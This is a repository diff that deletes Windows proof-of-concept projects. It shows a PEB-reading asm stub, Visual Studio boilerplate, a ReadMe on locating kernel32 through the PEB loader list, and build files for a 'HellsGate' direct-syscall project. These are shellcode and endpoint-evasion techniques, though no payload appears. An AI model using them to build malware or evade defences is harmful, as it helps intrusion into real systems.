GetPeb PROC
mov rax,gs:[60h]
ret
GetPeb ENDP
END

17
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/Resource.h
View File

@ -1,17 +0,0 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by GetKernel32Addressx64.rc
//
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

8
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/stdafx.cpp
View File

@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// GetKernel32Addressx64.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"
// TODO: 在 STDAFX.H 中
// 引用任何所需的附加头文件,而不是在此文件中引用

32
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/stdafx.h
View File

@ -1,32 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头文件中排除极少使用的信息
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件

8
Win32/Proof of Concepts/GetKernel32Addressx64/GetKernel32Addressx64/targetver.h
View File

@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义可用的最高版本的 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>

14
Win32/Proof of Concepts/GetKernel32Addressx64/ReadMe.txt
View File

@ -1,14 +0,0 @@
in x64
1.get peb from fs:[0x60] by asm file
2.get Ldr by peb
3.get kernel32 module in the third module
ntdll->kernelbase->kernel32
in x86
1.get peb from fs:[0x30] by inline asm
2.get Ldr by peb
3.get kernel32 module in the second module
ntdll->kernel32
the offset in the PEB is different from x64 and x86
This demo is only Test on Win7 x64

360
Win32/Proof of Concepts/HellsGate/.gitignore vendored
View File

@ -1,360 +0,0 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Ww][Ii][Nn]32/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Coverlet is a free, cross platform Code Coverage Tool
coverage*[.json, .xml, .info]
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
# Fody - auto-generated XML schema
FodyWeavers.xsd

31
Win32/Proof of Concepts/HellsGate/HellsGate.sln
View File

@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30114.105
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
EndGlobalSection
EndGlobal

Some files were not shown because too many files have changed in this diff Show More